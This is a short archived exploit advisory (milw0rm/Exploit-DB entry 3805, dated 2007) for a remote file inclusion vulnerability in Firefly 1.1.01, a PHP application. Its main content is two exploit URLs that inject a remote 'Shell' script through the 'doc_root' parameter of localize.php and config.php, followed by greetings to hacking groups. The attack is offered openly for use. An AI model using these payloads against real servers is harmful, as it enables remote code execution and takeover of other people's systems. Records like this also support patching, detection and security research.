Firefly 1.1.01 - 'doc_root' Remote File Inclusion

EDB-ID:

3805




Platform:

PHP

Date:

2007-04-26


# firefly 1.1.01 <=  Remote File Include Vulnerablitiy
# D.Script: http://fresh.t-systems-sfr.com/unix/src/privat2/firefly-1.1.01.tar.gz
# Discovered by: Alkomandoz Hacker
# Homepage: asb-may.net & mohandko.com & sniper-sa.com & Tryag.com

====================================
# Exploit:[Path]/modules/admin/include/localize.php?doc_root=Shell
# Exploit:[Path]/modules/admin/include/config.php?doc_root=Shell

====================================

# Greetz To:   AsbMay's Group & City Of Ghosts Team & Sniper-sa Team & No4Hard

# milw0rm.com [2007-04-26]